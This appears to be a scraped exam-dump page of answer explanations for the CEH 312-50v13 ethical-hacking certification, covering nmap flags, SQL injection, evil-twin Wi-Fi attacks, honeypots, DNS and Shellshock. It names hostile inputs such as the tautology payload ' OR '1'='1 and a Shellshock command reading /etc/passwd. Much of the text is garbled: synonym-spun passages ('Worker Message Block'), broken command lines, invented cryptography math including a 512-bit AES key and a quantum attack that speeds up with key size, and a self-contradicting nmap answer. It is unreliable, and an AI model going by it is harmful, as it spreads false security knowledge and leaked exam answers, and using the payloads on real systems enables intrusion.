ECCouncil 312-50v13 Dumps

Censys is a powerful Internet-wide scanning tool that allows users to:

Discover and analyze devices and services exposed to the public internet

Enumerate connected IoT devices, open ports, software versions

Provide structured and searchable reports for vulnerability analysis

According to CEH v13:

Censys continuously scans the IPv4 address space and maintains up-to-date databases of connected devices and their metadata.

Incorrect Options:

B. Wapiti is a web application vulnerability scanner.

C. NeuVector is a container security solution.

D. Lacework is a cloud workload protection platform, not focused on IoT enumeration.

Reference – CEH v13 Official Courseware:

Module 18: IoT and OT Hacking

Section: “IoT Discovery Tools”

Tool Focus: Censys, Shodan

===========

According to CEH v13 Module 03: Scanning Networks, when using Nmap for service enumeration and fingerprinting, the flag to determine service version and type information is:

-sV — Version Detection Scan

nmap -sV instructs Nmap to actively connect to open ports and probe the services running on those ports. This technique helps identify:

The service name (e.g., Apache, Nginx, etc.)

The version number (e.g., Apache 2.4.54)

The OS or device details (when possible)

This is especially useful when ports like 80 (HTTP) and 443 (HTTPS) are open, as it helps determine which web server is running (e.g., Apache, IIS, Nginx) and its version — which is critical for vulnerability assessment.

Why Other Options Are Incorrect:

A. -sv

❌ Incorrect syntax. Nmap flags are case-sensitive and this is a typo. Correct flag is -sV.

B. -Pn

Skips host discovery (ping scan). It does not provide service version info.

C. -V

Displays Nmap’s version, not the service version on the target.

D. -ss

Incorrect spelling. You may have meant -sS (TCP SYN scan), which is for port scanning, not version detection.

Correct Option is A, assuming the intent is to write the correct syntax as -sV. However, strictly speaking, if this is a case-sensitive exam, and the listed option is -sv (lowercase 'v'), it would be invalid. But based on CEH exam context where minor casing issues are accepted if conceptually correct, A is the best answer.

Reference from CEH v13 Study Guide and Courseware:

Module 03 – Scanning Networks, Section: Nmap Scan Types and Options

EC-Council iLabs: Performing Version Detection Using nmap -sV

Nmap Official Docs (Referenced in CEH):

-h | findstr " -sV" -sV: Probe open ports to determine service/version info

LAN Manager (LM) hashes are legacy password hashing methods used in older Windows systems (including Windows 2000 for backward compatibility). LM hashing works by:

Converting the password to uppercase.

Padding or truncating it to 14 characters.

Splitting it into two 7-character halves.

Using each half as a DES key to encrypt a known constant ("KGS!@#$%").

Therefore, LM hashing uses the DES (Data Encryption Standard) algorithm.

From CEH v13 Official Courseware:

Module 6: Malware Threats → Password Storage and LM Hash Structure

In CEH v13 Module 01: Introduction to Ethical Hacking, Gray Hat hackers are described as those who operate between ethical and unethical lines:

Gray Hat Characteristics:

Discover vulnerabilities without permission.

May explore or exploit them without malicious intent, but also without authorization.

May or may not disclose them after exploration.

Not fully black hat (malicious), nor white hat (authorized and ethical).

In this case, John explored sensitive employee data without authorization, even though he worked for the organization. That behavior places him in the gray hat category.

Option Clarification:

A. Cybercriminal: Generally linked to criminal activities for gain.

B. Black hat: Unauthorized access with malicious or financial intent.

C. White hat: Authorized ethical hackers.

D. Gray hat: Correct – Unauthorized, curious access without immediate harm.

Comprehensive and Detailed Explanation:

Blind SQL injection is used when the application does not return errors or display query results. In such cases, attackers use inference methods such as:

Boolean-based queries

Time-based queries (e.g., using SLEEP or WAITFOR DELAY)

Elliot’s use of timing delays indicates a time-based blind SQL injection.

From CEH v13 Courseware:

Module 10: Web Application Hacking → SQL Injection Types

WPA2-Enterprise networks authenticate clients through 802.1X using a RADIUS server. A common attack method described in CEH training is to create an evil-twin access point broadcasting the same SSID as the legitimate one. Combined with de-authentication frames, clients are forced off the real AP and automatically reconnect to the stronger rogue AP. This allows the attacker to capture authentication exchanges for later misuse, including credential harvesting or EAP-based downgrade attacks.

In CEH v13 Module 03: Scanning Networks, Nmap includes timing templates for controlling the speed and stealthiness of scans.

-T5: Insane mode – very fast, highly aggressive, easily detectable.

-T0: Paranoid mode – very slow and stealthy.

-O: Enables OS detection (not related to scan speed).

-A: Enables OS detection, version detection, script scanning, and traceroute (comprehensive but not specifically about speed).

Therefore:

If speed is your goal and you are not concerned about detection, then:

-T5 is the correct answer.

In CEH v13 Module 11: Hacking Wireless Networks, it is explained that disabling SSID broadcast only hides the SSID from casual scanning, not from determined attackers.

When a legitimate client connects to a hidden SSID, the SSID is included in the probe request and association packets, which can be easily sniffed using tools like Wireshark or Kismet.

Leaving authentication open adds no real protection.

Attackers can still capture traffic and use it to determine the SSID and connect to the access point.

A white hat (or a white hat hacker) is an ethical computer hacker, or a computer security expert, who focuses on penetration testing and in other testing methodologies that ensures the safety of an organization’s information systems. Ethical hacking may be a term meant to imply a broader category than simply penetration testing. Contrasted with black hat, a malicious hacker, the name comes from Western films, where heroic and antagonistic cowboys might traditionally wear a white and a black hat respectively. While a white hat hacker hacks under good intentions with permission, and a black hat hacker, most frequently unauthorized, has malicious intent, there’s a 3rd kind referred to as a gray hat hacker who hacks with good intentions but sometimes without permission.

White hat hackers can also add teams called “sneakers and/or hacker clubs”,red teams, or tiger teams.

While penetration testing concentrates on attacking software and computer systems from the beginning – scanning ports, examining known defects in protocols and applications running on the system and patch installations, as an example – ethical hacking may include other things. A full-blown ethical hack might include emailing staff to invite password details, searching through executive’s dustbins and typically breaking and entering, without the knowledge and consent of the targets. Only the owners, CEOs and Board Members (stake holders) who asked for such a censoring of this magnitude are aware. to undertake to duplicate a number of the destructive techniques a true attack might employ, ethical hackers may arrange for cloned test systems, or organize a hack late in the dark while systems are less critical. In most up-to-date cases these hacks perpetuate for the long-term con (days, if not weeks, of long-term human infiltration into an organization). Some examples include leaving USB/flash key drives with hidden auto-start software during a public area as if someone lost the tiny drive and an unsuspecting employee found it and took it.

Some other methods of completing these include:

• DoS attacks

• Social engineering tactics

• Reverse engineering

• Network security

• Disk and memory forensics

• Vulnerability research

• Security scanners such as:

– W3af

– Nessus

– Burp suite

• Frameworks such as:

– Metasploit

• Training Platforms

These methods identify and exploit known security vulnerabilities and plan to evade security to realize entry into secured areas. they’re ready to do that by hiding software and system ‘back-doors’ which will be used as a link to information or access that a non-ethical hacker, also referred to as ‘black-hat’ or ‘grey-hat’, might want to succeed in .

Nmap provides a scripting engine (NSE) that includes a script named http-methods. This script sends OPTIONS requests to the web server to determine which HTTP methods are supported. Identifying risky methods like PUT and DELETE helps detect misconfigured or vulnerable web servers.

Example command:

nmap --script http-methods -p 80

Reference – CEH v13 Official Study Guide:

Module 11: Hacking Web Applications

Quote:

“The Nmap script http-methods helps identify enabled HTTP methods including potentially dangerous ones like PUT and DELETE.”

Incorrect Options Explained:

B. http-enum is used to enumerate directories and applications, not methods.

C. http-headers retrieves HTTP headers.

D. http-git checks for Git repositories on web servers.

===========

Ransomware encrypts user data and extorts payment for restoration. CEH covers ransomware as a major threat in system hacking, highlighting encryption-based extortion as its defining behavior.

Implementing regular firmware updates for all IoT devices is the primary recommendation to prevent DDoS attacks on the smart city project. Firmware updates can fix security vulnerabilities, patch bugs, and improve performance of the IoT devices, making them less susceptible to malware infections and botnet recruitment12. Firmware updates can also enable new security features, such as encryption, authentication, and firewall, that can protect the IoT devices from unauthorized access and data theft3. Firmware updates should be done automatically or remotely, without requiring user intervention, to ensure timely and consistent security across the IoT network4.

The other options are not as effective or feasible as firmware updates for the following reasons:

B. Deploying network intrusion detection systems (IDS) across the IoT network can help detect and alert DDoS attacks, but not prevent them. IDS can monitor network traffic and identify malicious patterns, such as high volume, spoofed IP addresses, or unusual protocols, that indicate a DDoS attack5. However, IDS cannot block or mitigate the attack, and may even be overwhelmed by the flood of traffic, resulting in false positives or missed alerts. Moreover, deploying IDS across a vast network of IoT devices can be costly, complex, and resource-intensive, as it requires dedicated hardware, software, and personnel.

C. Establishing strong, unique passwords for each IoT device can prevent unauthorized access and brute-force attacks, but not DDoS attacks. Passwords can protect the IoT devices from being compromised by hackers who try to guess or crack the default or weak credentials. However, passwords cannot prevent DDoS attacks that exploit known or unknown vulnerabilities in the IoT devices, such as buffer overflows, command injections, or protocol flaws. Moreover, establishing and managing strong, unique passwords for each IoT device can be challenging and impractical, as it requires user awareness, memory, and effort.

D. Implementing IP address whitelisting for all IoT devices can restrict network access and communication to trusted sources, but not DDoS attacks. IP address whitelisting can filter out unwanted or malicious traffic by allowing only the predefined IP addresses to connect to the IoT devices. However, IP address whitelisting cannot prevent DDoS attacks that use spoofed or legitimate IP addresses, such as reflection or amplification attacks, that bypass the whitelisting rules. Moreover, implementing IP address whitelisting for all IoT devices can be difficult and risky, as it requires constant updating, testing, and monitoring of the whitelist, and may block legitimate or emergency traffic by mistake.

A brute force attack is a method of trying different combinations of passwords or keys to gain access to a system or service. It is not a reliable way of detecting a honeypot, as it may trigger an alert or response from the target. Moreover, a brute force attack does not provide any information about the system’s characteristics or behavior that could indicate a honeypot. A honeypot is a decoy system that is designed to attract and trap attackers, while providing security teams with valuable intelligence and insights. Therefore, an ethical hacker needs to use more subtle and stealthy techniques to detect and avoid honeypots.

The other options are valid techniques for detecting a honeypot. Probing system services and observing the three-way handshake can reveal anomalies or inconsistencies in the system’s responses, such as abnormal banners, ports, or protocols. Using honeypot detection tools like Send-Safe Honeypot Hunter can scan the target network and identify potential honeypots based on various criteria, such as IP address, domain name, or open ports. Analyzing the MAC address can detect instances running on VMware, which is a common platform for deploying honeypots. A honeypot running on VMware will have a MAC address that starts with 00:0C:29, 00:50:56, or 00:05:69. References:

What is a Honeypot? Types, Benefits, Risks and Best Practices

Using Honeypots for Network Intrusion Detection

Detecting Honeypot Access With Varonis

Comprehensive and Detailed Explanation:

To identify inconsistencies in secure asset records and confirm that systems meet baseline security standards, vulnerability scanning and checking data items (e.g., configuration settings, software versions) is essential. This helps the analyst discover gaps between expected and actual system states.

From CEH v13 Official Curriculum:

Module 5: Vulnerability Assessment → Security Assessment Techniques

“Automated vulnerability scanners and asset inventories help validate that systems are compliant with security baselines.”

Comprehensive and Detailed Explanation:

In Windows SID structure:

RID 500 = Default Administrator

RID 501 = Guest Account

Therefore, “-501” at the end indicates Matthew is operating as the Guest user, which has very limited privileges. To gain full administrative control, he must escalate his privileges.

From CEH v13 Courseware:

Module 6: System Hacking → Privilege Escalation Techniques

Network Access Control (NAC) solutions often authenticate only the first device connected to a port. CEH explains that attackers can insert a rogue device behind an already authenticated host, bypassing NAC checks. This creates a transparent bridge that forwards legitimate traffic while injecting attacker-controlled communications.

Worker Message Block (SMB) is an organization document sharing and information texture convention. SMB is utilized by billions of gadgets in a different arrangement of working frameworks, including Windows, MacOS, iOS , Linux, and Android. Customers use SMB to get to information on workers. This permits sharing of records, unified information the board, and brought down capacity limit needs for cell phones. Workers additionally use SMB as a feature of the Software-characterized Data Center for outstanding burdens like grouping and replication.

Since SMB is a far off record framework, it requires security from assaults where a Windows PC may be fooled into reaching a pernicious worker running inside a confided in organization or to a far off worker outside the organization edge. Firewall best practices and arrangements can upgrade security keeping malevolent traffic from leaving the PC or its organization.

For Windows customers and workers that don’t have SMB shares, you can obstruct all inbound SMB traffic utilizing the Windows Defender Firewall to keep far off associations from malignant or bargained gadgets. In the Windows Defender Firewall, this incorporates the accompanying inbound principles.

You should also create a new blocking rule to override any other inbound firewall rules. Use the following suggested settings for any Windows clients or servers that do not host SMB Shares:

Name: Block all inbound SMB 445

Description: Blocks all inbound SMB TCP 445 traffic. Not to be applied to domain controllers or computers that host SMB shares.

Action: Block the connection

Programs: All

Remote Computers: Any

Protocol Type: TCP

Local Port: 445

Remote Port: Any

Profiles: All

Scope (Local IP Address): Any

Scope (Remote IP Address): Any

Edge Traversal: Block edge traversal

You must not globally block inbound SMB traffic to domain controllers or file servers. However, you can restrict access to them from trusted IP ranges and devices to lower their attack surface. They should also be restricted to Domain or Private firewall profiles and not allow Guest/Public traffic.

In CEH v13 Module 09: Social Engineering, spear-phishing is described as a targeted email-based attack in which malicious actors craft highly personalized emails to specific individuals within an organization.

Characteristics from the scenario:

The attacker sends a fraudulent email to an employee.

The email contains a malicious attachment.

Once opened, malware is installed, targeting ICS/SCADA components.

The attack spreads and ultimately damages industrial systems.

This is a classic spear-phishing attack used as the initial infection vector in Advanced Persistent Threats (APT) targeting industrial control systems.

Why Others Are Incorrect:

B. SMiShing: SMS-based phishing; not email-related.

C. Reconnaissance: Pre-attack information gathering, not execution.

D. HMI-based attack: Targets Human-Machine Interface devices, but that’s not how the attack started here.

Tautology-based SQL injection tests, such as using ' OR '1'='1, are safe and effective methods to verify whether SQL queries are being manipulated by user input. CEH emphasizes avoiding destructive queries and using logical expressions that return all rows if injection is successful.

18 U.S.C. §1030, also known as the Computer Fraud and Abuse Act (CFAA), is a broad federal statute that criminalizes unauthorized access to computers and related fraudulent activities—including phishing and email scams.

From CEH v13 Official Courseware:

Module 1: Introduction to Ethical Hacking

Topic: U.S. Laws Related to Cybercrime

CEH v13 Study Guide states:

“Email-based frauds such as phishing, spoofing, and other social engineering attacks fall under the Computer Fraud and Abuse Act (18 U.S.C. §1030), which criminalizes unauthorized access and fraudulent behavior in computing systems.”

Incorrect Options:

B: Relates to credit cards and access devices.

C: Covers interference with government communication systems.

D: Covers illegal wiretapping and eavesdropping.

This question is about web link enumeration using Linux CLI tools — a common initial step during information gathering in penetration testing, covered in CEH v13 Module 02: Footprinting and Reconnaissance.

Objective:

Extract all hyperlinks (i.e., | grep ' Silently fetches the HTML source of the main page.

grep ' | grep "site"

❌ dirb is used for brute-forcing directories, not grabbing links from HTML.

C. wget | grep " | cut -d "http"

❌ Incorrect. Syntax error (cut -d"http" is invalid without correct delimiter formatting), and again wget needs to be directed to stdout using -O -.

Corrected Optimal Syntax for Real-World Use:

bash

CopyEdit

curl -s | grep -oP 'href="\Khttp[^"]+' | grep "site.com"

This uses -oP with Perl-compatible regex to extract only URLs and is a method recommended in CEH iLabs and demonstrations.

Reference from CEH v13 Study Materials:

Module 02 – Footprinting and Reconnaissance, Section: Website Footprinting and Web Crawling

CEH iLabs – Website Information Gathering Lab

CEH Engage Range: Passive and Active Footprinting Phase – Linux Scripting Tasks

Web Application Threats - Watering Hole Attack In a watering hole attack, the attacker identifies the kinds of websites a target company/individual frequently surfs and tests those particular websites to identify any possible vulnerabilities. Attacker injects malicious script/code into the web application that can redirect the webpage and download malware onto the victim machine. (P.1797/1781)

In IP networking, a private network is a computer network that uses private IP address space. Both the IPv4 and the IPv6 specifications define private IP address ranges. These addresses are commonly used for local area networks (LANs) in residential, office, and enterprise environments.

Private network addresses are not allocated to any specific organization. Anyone may use these addresses without approval from regional or local Internet registries. Private IP address spaces were originally defined to assist in delaying IPv4 address exhaustion. IP packets originating from or addressed to a private IP address cannot be routed through the public Internet.

The Internet Engineering Task Force (IETF) has directed the Internet Assigned Numbers Authority (IANA) to reserve the following IPv4 address ranges for private networks:

· 10.0.0.0 – 10.255.255.255

· 172.16.0.0 – 172.31.255.255

· 192.168.0.0 – 192.168.255.255

Backbone routers do not allow packets from or to internal IP addresses. That is, intranet machines, if no measures are taken, are isolated from the Internet. However, several technologies allow such machines to connect to the Internet.

· Mediation servers like IRC, Usenet, SMTP and Proxy server

· Network address translation (NAT)

· Tunneling protocol

NOTE: So, the problem is just one of these technologies.

In CEH v13 Module 11: Hacking Wireless Networks, Wardriving is explained as the practice of driving around with a Wi-Fi-enabled device to detect open or vulnerable wireless networks.

Key Characteristics of Wardriving:

Involves using laptops, smartphones, or specialized devices with Wi-Fi antennas.

Tools like NetStumbler, Kismet, or WiGLE may be used.

Often includes GPS tagging of discovered networks.

Used to identify unsecured access points for later exploitation.

Option Clarification:

A. GPS mapping: May be used with wardriving, but not the act itself.

B. Spectrum analysis: Measures RF spectrum usage; not network discovery.

C. Wardriving: Correct – searching for Wi-Fi networks while driving.

D. Wireless sniffing: Captures traffic; can happen during wardriving, but broader in scope.

Ettercap is a comprehensive MITM attack tool that supports live traffic interception and content injection. It can modify HTTP streams in real time and inject malicious payloads, such as JavaScript or applets, into web traffic.

Reference – CEH v13 Official Study Guide:

Module 8: Sniffing

Quote:

“Ettercap allows attackers to intercept, analyze, and alter data on the fly, including injecting malicious content like Java applets in HTTP sessions during MITM attacks.”

Incorrect Options Explained:

A & D. Wireshark and Tcpdump are passive sniffers with no injection capability.

C. Aircrack-ng is for Wi-Fi key cracking, not traffic manipulation.

===========

Rating CVSS Score

None 0.0

Low 0.1 - 3.9

Medium 4.0 - 6.9

High 7.0 - 8.9

Critical 9.0 - 10.0

The Common Vulnerability Scoring System (CVSS) is an open framework for communicating the characteristics and severity of software vulnerabilities. CVSS consists of three metric groups: Base, Temporal, and Environmental. The Base metrics produce a score ranging from 0 to 10, which can then be modified by scoring the Temporal and Environmental metrics. A CVSS score is also represented as a vector string, a compressed textual representation of the values used to derive the score. Thus, CVSS is well suited as a standard measurement system for industries, organizations, and governments that need accurate and consistent vulnerability severity scores. Two common uses of CVSS are calculating the severity of vulnerabilities discovered on one's systems and as a factor in prioritization of vulnerability remediation activities. The National Vulnerability Database (NVD) provides CVSS scores for almost all known vulnerabilities.

Qualitative Severity Rating Scale

For some purposes, it is useful to have a textual representation of the numeric Base, Temporal and Environmental scores.

The Shellshock vulnerability (CVE-2014-6271) allows attackers to execute arbitrary commands via crafted environment variables in Bash. In this example, the malicious command cat /etc/passwd is executed, displaying the contents of the file (which contains system user account info).

Reference – CEH v13 Official Study Guide:

Module 6: Malware Threats

Quote:

“Shellshock allows remote code execution through environment variables processed by Bash. Exploits can be used to run commands like cat /etc/passwd on a vulnerable system.”

Incorrect Options:

A. No file deletion occurs.

B. It doesn’t change passwords.

C. No user addition occurs.

===========

IoT devices that transmit data without encryption expose all communication to interception. CEH explains that attackers can position themselves between the IoT device and cloud service to manipulate or capture traffic. A MitM attack enables interception of commands, credentials, and firmware data due to the absence of TLS protections.

In CEH v13 Module 03: Scanning Networks, ICMP scan types are covered under host discovery techniques in Nmap/Zenmap.

The -PP option in Nmap is used to perform an ICMP timestamp request scan.

This method sends an ICMP timestamp request and listens for a timestamp reply from the target.

It helps analysts determine the system uptime and verify whether the host is alive (for stealthy discovery).

Option Clarification:

A. -PY: SCTP INIT Ping (used for SCTP-based hosts).

B. -PU: UDP Ping (sends UDP packets).

C. -PP: ICMP Timestamp Ping — correct answer.

D. -Pn: Skips host discovery (treats all hosts as alive), not a ping type.

In CEH v13 Module 02: Footprinting and Reconnaissance, Dark Web Footprinting is discussed as an advanced form of reconnaissance where attackers access hidden services and data using anonymity networks such as Tor (The Onion Router), I2P, or Freenet. These networks enable access to the deep web and dark web, where unindexed, and often illicit, content resides.

Key points relevant to this scenario:

The attacker encrypted browsing traffic and navigated anonymously, which strongly implies the use of tools like Tor or VPNs to mask identity.

The attacker used specialized tools/search engines like:

Torch

Ahmia

DarkSearch

Candle

The goal was to find sensitive or hidden information in government or federal systems — a common dark web footprinting objective.

The final step involved an attack that left no trace, which aligns with using the dark web for anonymity and obfuscation.

Option Analysis:

A. Dark web footprinting

Correct. This matches the behavior described: encrypted, anonymous access to sensitive information through dark web tools.

B. VoIP footprinting ❌

Incorrect. VoIP footprinting relates to identifying vulnerabilities or metadata in Voice over IP systems, not anonymous browsing or dark web activities.

C. VPN footprinting ❌

Incorrect. While VPNs may be used as part of anonymity, VPN footprinting refers to identifying systems using VPNs — not the act of gathering data anonymously.

D. Website footprinting ❌

Incorrect. Website footprinting involves gathering information from public-facing websites, like WHOIS data, robots.txt, and HTML metadata — not hidden dark web content.

Reference from CEH v13 Study Guide and Courseware:

Module 02 – Footprinting and Reconnaissance, Section: Footprinting through Dark Web and Deep Web

CEH v13 iLabs: Using Tor and Dark Web Search Engines for Reconnaissance

CEH Engage – Phase 1 (Reconnaissance): Dark Web Intelligence Gathering

A salt is random data that is used as an additional input to a one-way function that hashes data, a password, or passphrase. Salts are used to safeguard passwords in storage. Historically a password was stored in plaintext on a system, but over time additional safeguards were developed to protect a user's password against being read from the system. A salt is one of those methods.

A new salt is randomly generated for each password. In a typical setting, the salt and the password (or its version after key stretching) are concatenated and processed with a cryptographic hash function, and the output hash value (but not the original password) is stored with the salt in a database. Hashing allows for later authentication without keeping and therefore risking exposure of the plaintext password in the event that the authentication data store is compromised.

Salts defend against a pre-computed hash attack, e.g. rainbow tables. Since salts do not have to be memorized by humans they can make the size of the hash table required for a successful attack prohibitively large without placing a burden on the users. Since salts are different in each case, they also protect commonly used passwords, or those users who use the same password on several sites, by making all salted hash instances for the same password different from each other.

Risk assessment is a key process in security management that identifies, evaluates, and prioritizes risks to organizational operations and assets. It considers various controls and safeguards to mitigate those risks.

Administrative safeguards are part of the components used in risk assessments and include:

Policies

Procedures

Training

Security awareness programs

Incident response planning

From CEH v13:

Module 1: Introduction to Ethical Hacking

Module 20: Cryptography (as it discusses risk management and governance)

Topic: Security Controls and Risk Management Frameworks

CEH v13 Official Courseware states:

“Administrative controls, also known as administrative safeguards, form a critical component of risk assessments. These include documented security policies, user training, security audits, and incident response plans that help an organization manage and reduce risks.”

Incorrect Options:

B. Physical security is a type of safeguard but not typically referred to as a "component" of a risk assessment itself.

C. DMZ (Demilitarized Zone) is a network architecture concept, not a risk assessment component.

D. Logical interface refers to system architecture and network segmentation—not risk assessment methodology.

Comprehensive and Detailed Explanation:

Fake antivirus (also known as scareware) tricks users into downloading malware disguised as legitimate antivirus software.

The best approach:

Google the product name and URL.

Check reputable forums, antivirus vendors, or security advisories.

Look for phishing warnings or reports of malware.

From CEH v13 Courseware:

Module 7: Social Engineering and Phishing Scams

Module 6: Malware Threats → Rogue Software

A cloud carrier acts as an intermediary that provides connectivity and transport of cloud services between cloud consumers and cloud providers.

Cloud carriers provide access to consumers through network, telecommunication and other access devices. for instance, cloud consumers will obtain cloud services through network access devices, like computers, laptops, mobile phones, mobile web devices (MIDs), etc.

The distribution of cloud services is often provided by network and telecommunication carriers or a transport agent, wherever a transport agent refers to a business organization that provides physical transport of storage media like high-capacity hard drives.

Note that a cloud provider can started SLAs with a cloud carrier to provide services consistent with the level of SLAs offered to cloud consumers, and will require the cloud carrier to provide dedicated and secure connections between cloud consumers and cloud providers.

Most likely have an issue with DNS.

DNS stands for “Domain Name System.” It’s a system that lets you connect to websites by matching human-readable domain names (like example.com) with the server's unique ID where a website is stored.

Think of the DNS system as the internet’s phonebook. It lists domain names with their corresponding identifiers called IP addresses, instead of listing people’s names with their phone numbers. When a user enters a domain name like wpbeginner.com on their device, it looks up the IP address and connects them to the physical location where that website is stored.

NOTE: Often DNS lookup information will be cached locally inside the querying computer or remotely in the DNS infrastructure. There are typically 8 steps in a DNS lookup. When DNS information is cached, steps are skipped from the DNS lookup process, making it quicker. The example below outlines all 8 steps when nothing is cached.

The 8 steps in a DNS lookup:

1. A user types ‘example.com’ into a web browser, and the query travels into the Internet and is received by a DNS recursive resolver;

2. The resolver then queries a DNS root nameserver;

3. The root server then responds to the resolver with the address of a Top-Level Domain (TLD) DNS server (such as .com or .net), which stores the information for its domains. When searching for example.com, our request is pointed toward the .com TLD;

4. The resolver then requests the .com TLD;

5. The TLD server then responds with the IP address of the domain’s nameserver, example.com;

6. Lastly, the recursive resolver sends a query to the domain’s nameserver;

7. The IP address for example.com is then returned to the resolver from the nameserver;

8. The DNS resolver then responds to the web browser with the IP address of the domain requested initially;

Once the 8 steps of the DNS lookup have returned the IP address for example.com, the browser can request the web page:

9. The browser makes an HTTP request to the IP address;

10. The server at that IP returns the webpage to be rendered in the browser.

NOTE 2: DNS primarily uses the User Datagram Protocol (UDP) on port number 53 to serve requests. And if this port is blocked, then a problem arises already in the first step. But the ninth step is performed without problems.

Comprehensive and Detailed Explanation:

Script Kiddies are individuals with minimal technical skills who use existing tools or scripts developed by others to perform attacks. They generally do not understand the underlying mechanisms and rely on publicly available hacking tools.

From CEH v13 Official Study Guide:

Module 1: Introduction to Ethical Hacking → Hacker Types

“Script kiddies are unskilled attackers who use tools created by others.”

To block NetBIOS and related Windows networking traffic from traversing a firewall (especially from external sources), you should block the following ports:

Port 135 (TCP/UDP): Microsoft RPC endpoint mapper (DCOM/RPC)

Port 139 (TCP): NetBIOS Session Service

Port 445 (TCP): Direct-hosted SMB over TCP/IP (Windows 2000+)

These ports are commonly used for:

File sharing

RPC-based communication

Windows network services

From CEH v13 Official Courseware:

Module 3: Scanning Networks

Module 4: Enumeration

CEH v13 Study Guide states:

“To prevent external enumeration, remote file sharing, and NetBIOS attacks, administrators should block inbound access to ports 135, 139, and 445 on the firewall.”

Incorrect Options:

A (110): POP3 mail service

D (161): SNMP

F (1024): High ephemeral port; not specific to NetBIOS

JXplorer could be a cross platform LDAP browser and editor. it’s a standards compliant general purpose LDAP client which will be used to search, scan and edit any commonplace LDAP directory, or any directory service with an LDAP or DSML interface.

It is extremely flexible and can be extended and custom in a very number of the way. JXplorer is written in java, and also the source code and source code build system ar obtainable via svn or as a packaged build for users who wish to experiment or any develop the program.

JX is is available in 2 versions; the free open source version under an OSI Apache two style licence, or within the JXWorkBench Enterprise bundle with inbuilt reporting, administrative and security tools.

JX has been through a number of different versions since its creation in 1999; the foremost recent stable release is version 3.3.1, the August 2013 release.

JXplorer could be a absolutely useful LDAP consumer with advanced security integration and support for the harder and obscure elements of the LDAP protocol. it’s been tested on Windows, Solaris, linux and OSX, packages are obtainable for HPUX, AIX, BSD and it should run on any java supporting OS.

-oX - Requests that XML output be directed to the given filename.

A hybrid encryption system is a system that combines the advantages of both asymmetric and symmetric encryption algorithms. Asymmetric encryption, such as RSA, uses a pair of keys: a public key and a private key, which are mathematically related but not identical. Asymmetric encryption can provide key exchange, authentication, and non-repudiation, but it is slower and less efficient than symmetric encryption. Symmetric encryption, such as AES, uses a single key to encrypt and decrypt data. Symmetric encryption is faster and more efficient than asymmetric encryption, but it requires a secure way to share the key.

In a hybrid encryption system, RSA encryption is used for key exchange, and AES encryption is used for data encryption. This way, the system can benefit from the security of RSA and the speed of AES. However, the system also depends on the key sizes of both algorithms, which affect the security and performance of the system.

The key size of RSA encryption determines the number of bits in the public and private keys. The larger the key size, the more secure the encryption, but also the slower the key generation and encryption/decryption processes. The time complexity of generating an RSA key pair is O(n*2), where n is the key size in bits. This means that the time required to generate an RSA key pair increases quadratically with the key size. For example, if it takes 1 second to generate a 1024-bit RSA key pair, it will take 4 seconds to generate a 2048-bit RSA key pair, and 16 seconds to generate a 4096-bit RSA key pair.

The key size of AES encryption determines the number of bits in the symmetric key. The larger the key size, the more secure the encryption, but also the more rounds of encryption/decryption are needed. The time complexity of AES encryption is O(n), where n is the key size in bits. This means that the time required to encrypt/decrypt data increases linearly with the key size. For example, if it takes 1 second to encrypt/decrypt data with a 128-bit AES key, it will take 2 seconds to encrypt/decrypt data with a 256-bit AES key, and 4 seconds to encrypt/decrypt data with a 512-bit AES key.

An attacker has developed a quantum algorithm with time complexity O((log n)*2) to crack RSA encryption. This means that the time required to break RSA encryption decreases exponentially with the key size. For example, if it takes 1 second to break a 1024-bit RSA encryption, it will take 0.25 seconds to break a 2048-bit RSA encryption, and 0.0625 seconds to break a 4096-bit RSA encryption. This makes RSA encryption vulnerable to quantum attacks, unless the key size is very large.

Given n=4000 and variable AES key size, the scenario that is likely to provide the best balance of security and performance is C. AES key size=192 bits. This configuration is a compromise between options A and B, providing moderate security and performance. Option A, AES key size=128 bits, provides less security than option C, but RSA key generation and AES encryption will be faster. Option B, AES key size=256 bits, provides more security than option C, but RSA key generation may be slow. Option D, AES key size=512 bits, provides the highest level of security, but at a significant performance cost due to the large AES key size.

A vulnerability assessment is a systematic review of security weaknesses in an information system. It evaluates if the system is susceptible to any known vulnerabilities, assigns severity levels to those vulnerabilities, and recommends remediation or mitigation, if and whenever needed1. A vulnerability assessment can be performed using various tools and techniques, depending on the scope and objectives of the assessment.

Considering the potential vulnerability sources, the best initial approach to vulnerability assessment is to check for hardware and software misconfigurations to identify any possible loopholes. Hardware and software misconfigurations are common sources of vulnerabilities that can expose the system to unauthorized access, data breaches, or service disruptions. Hardware and software misconfigurations can include:

Insecure default settings, such as weak passwords, open ports, unnecessary services, or verbose error messages.

Improper access control policies, such as granting excessive privileges, allowing anonymous access, or failing to revoke access for terminated users.

Lack of encryption or authentication mechanisms, such as using plain text protocols, storing sensitive data in clear text, or transmitting data without verifying the identity of the sender or receiver.

Outdated or incompatible software versions, such as using unsupported or deprecated software, failing to apply security patches, or having software conflicts or dependencies.

Checking for hardware and software misconfigurations can help identify any possible loopholes that could be exploited by attackers to compromise the system or the data. Checking for hardware and software misconfigurations can be done using various tools, such as:

Configuration management tools, such as Ansible, Puppet, or Chef, that can automate the deployment and maintenance of consistent and secure configurations across the system.

Configuration auditing tools, such as Nipper, Lynis, or OpenSCAP, that can scan the system for deviations from the desired or expected configurations and report any issues or vulnerabilities.

Configuration testing tools, such as Inspec, Serverspec, or Testinfra, that can verify the system’s compliance with the specified configuration rules and standards.

Therefore, checking for hardware and software misconfigurations is the best initial approach to vulnerability assessment, as it can help identify and eliminate any possible loopholes that could pose a security risk to the system or the data.

An iPhone client’s most noticeably terrible bad dream is to have somebody oversee his/her gadget, including the capacity to record and control all action without waiting be in a similar room. In this blog entry, we present another weakness called “Trustjacking”, which permits an aggressor to do precisely that.

This weakness misuses an iOS highlight called iTunes Wi-Fi sync, which permits a client to deal with their iOS gadget without genuinely interfacing it to their PC. A solitary tap by the iOS gadget proprietor when the two are associated with a similar organization permits an assailant to oversee the gadget. Furthermore, we will stroll through past related weaknesses and show the progressions that iPhone has made to alleviate them, and why these are adequately not to forestall comparative assaults.

After interfacing an iOS gadget to another PC, the clients are being found out if they trust the associated PC or not. Deciding to believe the PC permits it to speak with the iOS gadget by means of the standard iTunes APIs.

This permits the PC to get to the photographs on the gadget, perform reinforcement, introduce applications and considerably more, without requiring another affirmation from the client and with no recognizable sign. Besides, this permits enacting the “iTunes Wi-Fi sync” highlight, which makes it conceivable to proceed with this sort of correspondence with the gadget even after it has been detached from the PC, as long as the PC and the iOS gadget are associated with a similar organization. It is intriguing to take note of that empowering “iTunes Wi-Fi sync” doesn’t need the casualty’s endorsement and can be directed simply from the PC side.

